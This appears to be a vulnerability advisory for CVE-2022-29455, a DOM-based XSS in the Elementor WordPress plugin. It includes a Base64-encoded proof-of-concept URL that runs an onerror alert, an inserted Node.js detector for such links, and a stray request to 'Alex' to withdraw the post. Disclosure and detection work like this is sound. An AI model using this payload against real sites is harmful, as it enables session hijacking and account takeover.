A DOM-based reflected Cross-Site Scripting (XSS) vulnerability affects Elementor's Elementor Website Builder plugin for WordPress, versions <= 3.5.5.
This issue is tracked as CVE-2022-29455.
4websecurity.com has already reported the vulnerability to tens of thousands of websites that use WordPress and this version of the plugin.
References:
– https://nvd.nist.gov/vuln/detail/CVE-2022-29455
– https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
– https://www.rotem-bar.com/elementor
* POC (Proof Of Concept):
The payload is Base64 encoded:
https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=
Decoded from Base64:
https://example.com/#elementor-action:action=lightbox&settings={"type":"video","url":"http://","videoType":"hosted","videoParams":{"onerror":"alert(document.domain)"}}
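For defenders, the following Node.js code (an added example, not part of the original post or of Elementor's code) decodes an `#elementor-action` fragment in the format shown above and reports any event-handler keys such as `onerror` inside the settings. The function names and the benign sample link are constructed for illustration; because a URL fragment is never sent to the web server, run this over links found in mail, chat or page content rather than access logs.

```javascript
// Added example: triage links carrying the elementor-action lightbox fragment shown above.
const PREFIX = "#elementor-action:";

// Recursively collect paths of keys that look like DOM event-handler attributes (on*).
function findHandlers(value, path = "settings") {
  if (value === null || typeof value !== "object") return [];
  return Object.entries(value).flatMap(([key, child]) => {
    const here = `${path}.${key}`;
    const hit = /^on[a-z]+$/i.test(key.trim()) ? [here] : [];
    return hit.concat(findHandlers(child, here));
  });
}

// Returns { isAction, action, settings, handlers, error } for one URL string.
function inspectElementorLink(rawUrl) {
  const out = { isAction: false, action: null, settings: null, handlers: [], error: null };
  try {
    // Tolerate fragments that arrive percent-encoded.
    const hash = decodeURIComponent(new URL(rawUrl).hash);
    if (!hash.toLowerCase().startsWith(PREFIX)) return out;
    out.isAction = true;
    const params = Object.create(null);
    for (const pair of hash.slice(PREFIX.length).split("&")) {
      const i = pair.indexOf("=");
      // Split by hand: URLSearchParams would turn a base64 "+" into a space.
      if (i > 0) params[pair.slice(0, i)] = pair.slice(i + 1);
    }
    out.action = params.action ?? null;
    if (params.settings !== undefined) {
      out.settings = JSON.parse(Buffer.from(params.settings, "base64").toString("utf8"));
      out.handlers = findHandlers(out.settings);
    }
  } catch (err) {
    out.error = err.message; // malformed URL, percent-encoding or JSON
  }
  return out;
}

// Constructed samples: the PoC link from this page, a benign lightbox link, a plain anchor.
const benign = Buffer.from(JSON.stringify({ type: "video", url: "https://example.com/v.mp4",
  videoType: "hosted", videoParams: { controls: "", loop: "" } })).toString("base64");
const SAMPLES = [
  "https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=",
  `https://example.com/#elementor-action:action=lightbox&settings=${benign}`,
  "https://example.com/#pricing",
];
for (const url of SAMPLES) {
  const r = inspectElementorLink(url);
  console.log(r.isAction, r.action, r.handlers, r.error);
}
```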
Impact:
XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account.
Fix: Update the plugin to the latest version!
Alex,
kindly remove this post before the disclosure period is over for the submitted vulnerability.